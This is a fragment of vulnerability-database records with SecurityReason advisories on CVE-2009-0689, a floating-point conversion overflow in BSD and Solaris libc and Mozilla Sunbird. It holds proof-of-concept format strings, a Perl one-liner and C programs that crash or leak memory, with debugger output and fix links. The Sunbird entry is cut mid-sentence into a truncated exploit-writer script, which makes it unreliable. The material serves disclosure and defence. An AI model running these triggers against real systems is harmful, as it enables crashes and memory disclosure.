libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2G8ACgkQpiCeOKaYa9YMzACgwvAI8oo1UP6GwlmGq3m+gkHm\r\nmVoAnArUxHXAPkrpEPOOLi4X99l5sAFh\r\n=VtH9\r\n-----END PGP SIGNATURE-----\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-14959", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:45:47", "description": "BUGTRAQ ID: 35510\r\nCVE(CAN) ID: CVE-2009-0689\r\n\r\nOpenBSD\u3001NetBSD\u3001FreeBSD\u90fd\u662f\u6d41\u884c\u7684BSD\u64cd\u4f5c\u7cfb\u7edf\uff0c\u662fUnix\u7684\u884d\u751f\u7cfb\u7edf\u3002\r\n\r\nOpenBSD\u3001NetBSD\u3001FreeBSD\u7684dtoa\u5b9e\u73b0\u4e2d\u5b58\u5728\u6570\u7ec4\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5728src/lib/libc/gdtoa/gdtoaimp.h\u4e2d\uff1a\r\n\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax 15\r\n...\r\n- ---gdtoaimp.h---\r\n\r\n\u6700\u5927\u7684Kmax\u957f\u5ea6\u4e3a15\uff0c\u5982\u679c\u63d0\u4f9b\u4e86\u66f4\u5927\u7684\u503c\uff08\u598217\uff09\uff0c\u7a0b\u5e8f\u5c31\u4f1a\u6ea2\u51fafreelist\u6570\u7ec4\uff0cbss\u4e3a0x1\u3002\r\n\r\n\u4ee5NetBSD\u4e3a\u4f8b\uff1a\r\n\r\n- ---gdtoaimp.h---\r\n...\r\n#define Kmax (sizeof(size_t) &lt;&lt; 3)\r\n...\r\n- ---gdtoaimp.h---\r\n\r\n\u7a0b\u5e8f\u5728misc.c\u4e2d\u5d29\u6e83\uff1a\r\n\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\nif ( (rv = freelist[k]) !=0) {\r\nfreelist[k] = rv-&gt;next;\r\n}\r\nelse {\r\nx = 1 &lt;&lt; k;\r\n#ifdef Omit_Private_Memory\r\nrv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));\r\n#else\r\nlen = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1)\r\n/sizeof(double);\r\nif ((double *)(pmem_next - private_mem + len) &lt;= (double *)PRIVATE_mem)\r\n{\r\nrv = (Bigint*)(void *)pmem_next;\r\npmem_next += len;\r\n}\r\nelse\r\nrv = (Bigint*)MALLOC(len*sizeof(double));\r\n#endif\r\nif (rv == NULL)\r\nreturn NULL;\r\nrv-&gt;k = k;\r\nrv-&gt;maxwds = x;\r\n}\r\n- --- src/lib/libc/gdtoa/misc.c ---\r\n\r\n\u8fd9\u91cc\r\n\r\nrv-&gt;k = k;\r\n\r\n\u6216\r\n\r\nfreelist[k] = rv-&gt;next;\n\nFreeBSD FreeBSD 7.2\r\nFreeBSD FreeBSD 6.4\r\nNetBSD NetBSD 5.0\r\nOpenBSD OpenBSD 4.5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nNetBSD\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD\r\n-------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c", "published": "2009-06-30T00:00:00", "type": "seebug", "title": "\u591a\u4e2aBSD\u7cfb\u7edfgdtoa/misc.c\u6587\u4ef6\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-06-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11711", "id": "SSV:11711", "sourceData": "\n printf %1.262159f 1.1\r\nprintf %11.2109999999f\r\nprintf %11.2009999999f\r\nprintf %11.2009999999f\r\n\r\n#!/usr/local/bin/perl\r\nprintf &quot;%0.4194310f&quot;, 0x0.0x41414141;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11711", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:10:56", "description": "BUGTRAQ ID: 40309\r\n\r\nSolaris\u662f\u4e00\u6b3e\u7531Sun\u5f00\u53d1\u548c\u7ef4\u62a4\u7684\u5546\u4e1aUNIX\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nSolaris\u64cd\u4f5c\u7cfb\u7edf\u7684libc\u5e93\u4e2d\u6240\u4f7f\u7528\u7684econvert()\u3001ecvt()\u3001fcvt()\u548cgcvt()\u7b49\u51fd\u6570\u5728\u6267\u884c\u6570\u5b57\u8f6c\u6362\u64cd\u4f5c\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u63d0\u4ea4\u6076\u610f\u8bf7\u6c42\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e9b\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nSun Solaris 10.0_x86\r\nSun Solaris 10.0\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSun\r\n---\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://sunsolve.sun.com/security", "published": "2010-05-25T00:00:00", "type": "seebug", "title": "Sun Solaris\u591a\u4e2alibc\u5e93\u6570\u5b57\u8f6c\u6362\u51fd\u6570\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19689", "id": "SSV:19689", "sourceData": "\n - --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow ---\r\nThe main problem exists in sun solaris libc. OpenSolaris is not affected.\r\n\r\nPoC:\r\n- ---\r\n# cat jaja.c\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nchar number[10000];\r\n\r\nint a,b;\r\n\r\nprintf(&quot;%s&quot;, fconvert((double)0,atoi(argv[1]),&amp;a,&amp;b,number));\r\nreturn 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja jaja.c\r\n# ./jaja 16\r\n0000000000000000#\r\n# ./jaja 512\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n000000000000000000000000000000000000000000000000000000000000000000000000000\r\n00000000000000000000000000000000000000000000000000000000000000#\r\n- ---\r\n\r\nfor 512 will work fine, because we have used (double)0 to convert. When we\r\nuse no zero value, then crash.\r\n\r\nok. let`s set no zero value in jaja2.c\r\n\r\nPoc:\r\n- ---\r\n# cat jaja2.c\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nchar number[10000];\r\n\r\nint a,b;\r\n\r\nprintf(&quot;%s&quot;, fconvert((double)1,atoi(argv[1]),&amp;a,&amp;b,number));\r\nreturn 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja2 jaja2.c\r\n# ./jaja2 512\r\nSegmentation fault (core dumped)\r\n# /usr/local/bin/gdb -q jaja2\r\n(no debugging symbols found)\r\n(gdb) r 512\r\nStarting program: /jaja2 512\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeab05c in fconvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0x8047240 134509120\r\necx 0x3250 12880\r\nedx 0x8048000 134512640\r\nebx 0xfef9e000 -17178624\r\nesp 0x8044b38 0x8044b38\r\nebp 0x8044d68 0x8044d68\r\nesi 0x200 512\r\nedi 0x0 0\r\neip 0xfeeab05c 0xfeeab05c &lt;fconvert+163&gt;\r\neflags 0x10206 [ PF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n(gdb) x/x $edx\r\n0x8048000: Cannot access memory at address 0x8048000\r\n(gdb)\r\n- ---\r\n\r\nthe same result we can get with perl(1)\r\n\r\nPoC perl:\r\n- ---\r\n#!/usr/local/bin/perl\r\nprintf &quot;%.512f&quot;, 1;\r\n# perl pss.pl\r\nSegmentation Fault - core dumped\r\n# /usr/local/bin/gdb -q perl\r\n(no debugging symbols found)\r\n(gdb) r pss.pl\r\nStarting program: /usr/bin/perl pss.pl\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfed7b05c in fconvert () from /lib/libc.so.1\r\n- ---\r\n\r\nok.\r\n\r\nfunction like *cvt(3) are also affected. let`s check ecvt(3)\r\n\r\nPoC:\r\n- ---\r\n# cat jaja3.c\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\nint main (int argc, char *argv[]){\r\n\r\nint a,b;\r\n\r\nprintf(&quot;%s&quot;, ecvt((double)1,atoi(argv[1]),&amp;a,&amp;b));\r\nreturn 0;\r\n}\r\n\r\n# ./jaja3 3405\r\n%Y....[some_part_of_memory]\r\n#\r\n- ---\r\n\r\nit`s look like a memory disclosure\r\n\r\nlet's see bigger value\r\n\r\nPoC:\r\n- ---\r\n# ./jaja3 3500\r\nSegmentation fault (core dumped)\r\n- ---\r\n\r\nnow is the time to debug it\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q jaja3\r\n(no debugging symbols found)\r\n(gdb)\r\n(gdb) r 4000\r\nStarting program: /jaja3 4000\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf72 in econvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0xf00 3840\r\necx 0xdac 3500\r\nedx 0xfef929ab -17225301\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xfa0 4000\r\nedi 0x1 1\r\neip 0xfeeaaf72 0xfeeaaf72 &lt;econvert+144&gt;\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\neip can be differ, not ever in econvert+144\r\n\r\nPoC:\r\n- ---\r\n(gdb) r 3501111111\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\nStarting program: /jaja3 3501111111\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf89 in econvert () from /lib/libc.so.1\r\n(gdb) i r\r\neax 0xcfa7d347 -811084985\r\necx 0x0 0\r\nedx 0x1 1\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xd0aeb747 -793856185\r\nedi 0x1 1\r\neip 0xfeeaaf89 0xfeeaaf89 &lt;econvert+167&gt;\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\nand not ever should crash in econvert\r\n\r\nvery interesting behavior, we can see in printf(1) program\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q printf\r\n(no debugging symbols found)\r\n(gdb) r %.011111f 0\r\nStarting program: /usr/bin/printf %.011111f 0\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeea48da in _malloc_unlocked () from /lib/libc.so.1\r\n(gdb) r %.0111111f 0\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n\r\nStarting program: /usr/bin/printf %.0111111f 0\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee852ab in memcpy () from /lib/libc.so.1\r\n\r\n(gdb) r %.0111111f 1\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n\r\nStarting program: /usr/bin/printf %.0111111f 1\r\n[New LWP 1 ]\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n(no debugging symbols found)\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee8b05c in fconvert () from /lib/libc.so.1\r\n(gdb) x/i $eip\r\n0xfee8b05c &lt;fconvert+163&gt;: mov %al,(%edx)\r\n- ---\r\n\r\nfor printf(1) we have get eip in:\r\n- - fconvert+163 (the same like in jaja2=512)\r\n- - memcpy\r\n- - _malloc_unlocked\r\n- - others\r\n\r\nthis vuln is very similar to CVE-2009-0689 but we don't have founded part\r\nof gdtoa license in Oracle license and bahavior for above examples are\r\ndiffers as in CVE-2009-0689.\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/lib\r\nc/gen/common/ecvt.c\r\n\r\n- ---\r\n34 char *\r\n35 ecvt(arg, ndigits, decpt, sign)\r\n36 double arg;\r\n37 int ndigits, *decpt, *sign;\r\n38 {\r\n39 if (efcvtbuffer == NULL)\r\n40 efcvtbuffer = (char *)calloc(1,1024);\r\n41 return econvert(arg, ndigits, decpt, sign, efcvtbuffer);\r\n42 }\r\n43\r\n- ---\r\n\r\nefcvtbuffer = (char *)calloc(1,1024);\r\nand ndigits is bigger from efcvtbuffer size.\r\n\r\nnow we show econvert(),\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/lib\r\nc/gen/common/econvert.c\r\n\r\n- ---\r\n34 econvert(arg, ndigits, decpt, sign, buf)\r\n35 double arg;\r\n36 int ndigits, *decpt, *sign;\r\n37 char *buf;\r\n38 {\r\n39 decimal_mode dm;\r\n40 decimal_record dr;\r\n41 fp_exception_field_type ef;\r\n42 int i;\r\n43 char *pc;\r\n44 int nc;\r\n45\r\n46 dm.rd = fp_direction; /* Rounding direction. */\r\n47 dm.df = floating_form; /* E format. */\r\n48 dm.ndigits = ndigits; /* Number of significant digits. */\r\n49 double_to_decimal(&amp;arg, &amp;dm, &amp;dr, &amp;ef);\r\n50 *sign = dr.sign;\r\n51 switch (dr.fpclass) {\r\n52 case fp_normal:\r\n53 case fp_subnormal:\r\n54 *decpt = dr.exponent + ndigits;\r\n55 for (i = 0; i &lt; ndigits; i++)\r\n56 buf[i] = dr.ds[i];\r\n57 buf[ndigits] = 0;\r\n58 break;\r\n- ---\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19689", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:56", "description": "No description provided by source.", "published": "2009-12-11T00:00:00", "title": "&quot;Sunbird 0.9 Array Overrun (code\texecution) 0day&quot;", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-12-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18465", "id": "SSV:18465", "sourceData": "\n full disclosure: http://seclists.org/fulldisclosure/2009/Dec/253\r\n\r\n[ Sunbird 0.9 Array Overrun (code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- Dis.: 07.05.2009\r\n- Pub.: 11.12.2009\r\n\r\nCVE: CVE-2009-0689\r\nCWE: CWE-199\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- Sunbird 0.9\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/77\r\n\r\n\r\n--- 0.Description ---\r\nMozilla Sunbird is a cross-platform calendar application, built upon\r\nMozilla Toolkit. Our goal is to provide you with a full-featured and\r\neasy to use calendar application that you can use around the world.\r\n\r\n\r\n--- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. Sunbird has the same dtoa\r\nas Firefox, etc. Problem exist in js3250.dll (version 4.0.0 - Netscape\r\n32-bit JavaScript Module) DLL library\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\r\nit is possible to call 16&gt;test.ics');\r\nprint myfile $header.$s.$expl.$footer;\r\n-----------------------\r\n\r\n0:000&gt; r\r\neax=015e06f9 ebx=00000001 ecx=658cebec edx=00000002 esi=015e0710\r\nedi=015e06f9\r\neip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010206\r\njs3250!JS_strtod+0xb0a:\r\n600f154f 8b01 mov eax,dword ptr [ecx]\r\nds:0023:658cebec=????????\r\n0:000&gt; ub 600f1551\r\njs3250!JS_strtod+0xaf2:\r\n600f1537 83c414 add esp,14h\r\n600f153a 8b75fc mov esi,dword ptr [ebp-4]\r\n600f153d e96bf5ffff jmp js3250!JS_strtod+0x68 (600f0aad)\r\n600f1542 56 push esi\r\n600f1543 57 push edi\r\n600f1544 8b7c240c mov edi,dword ptr [esp+0Ch]\r\n600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560\r\n(6014d008)[edi*4]\r\n600f154f 8b01 mov eax,dword ptr [ecx]\r\n0:000&gt; !exchain\r\n0012fc9c: USER32!_except_handler3+0 (7e39048f)\r\nCRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d)\r\n0012fcf4: USER32!_except_handler3+0 (7e39048f)\r\nCRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a)\r\nfunc: USER32!DispatchMessageWorker+126 (7e390762)\r\n0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745)\r\n0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818)\r\n0012ffe0: kernel32!_except_handler3+0 (7c839ac0)\r\nCRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882)\r\nfunc: kernel32!BaseProcessStart+3a (7c843898)\r\nInvalid exception stack at ffffffff\r\n0:000&gt; k\r\nChildEBP RetAddr\r\nWARNING: Stack unwind information not available. Following frames may be\r\nwrong.\r\n0012e35c 600f15f3 js3250!JS_strtod+0xb0a\r\n0012e37c 600f0ef9 js3250!JS_strtod+0xbae\r\n0012e3f4 6010e8eb js3250!JS_strtod+0x4b4\r\n0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf\r\n0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa\r\n0012e5dc 6010195e js3250!js_Invoke+0x2c1b\r\n0012e694 60101cb2 js3250!js_Invoke+0x5c4\r\n0012e71c 60101e0a js3250!js_Invoke+0x918\r\n0012e74c 6011350d js3250!js_Invoke+0xa70\r\n0012e7a4 600e3c41 js3250!js_FindProperty+0x974\r\n0012e7bc 004274cf js3250!JS_SetProperty+0x36\r\n0012e978 0042593e sunbird!NS_RegistryGetFactory+0x1c585\r\n0012ea44 6035c7f1 sunbird!NS_RegistryGetFactory+0x1a9f4\r\n0012ea60 6035d30b xpcom_core!nsXPTCStubBase::Stub3+0x20\r\n0012ea74 00421fde xpcom_core!XPTC_InvokeByIndex+0x27\r\n0012ec2c 0041fe00 sunbird!NS_RegistryGetFactory+0x17094\r\n0012ecc0 60101906 sunbird!NS_RegistryGetFactory+0x14eb6\r\n0012ed80 60101cb2 js3250!js_Invoke+0x56c\r\n0012ee08 60101e0a js3250!js_Invoke+0x918\r\n0012ee38 6011350d js3250!js_Invoke+0xa70\r\n\r\n\r\n--- 3. SecurityReason Note ---\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- OpenBSD\r\n- NetBSD\r\n- FreeBSD\r\n- MacOSX\r\n- Google Chrome\r\n- Mozilla Firefox\r\n- Mozilla Seamonkey\r\n- Mozilla Thunderbird\r\n- Mozilla Sunbird\r\n- Mozilla Camino\r\n- KDE (example: konqueror)\r\n- Opera\r\n- K-Meleon\r\n- F-Lock\r\n\r\nThis list is not yet closed.\r\n\r\n\r\n--- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb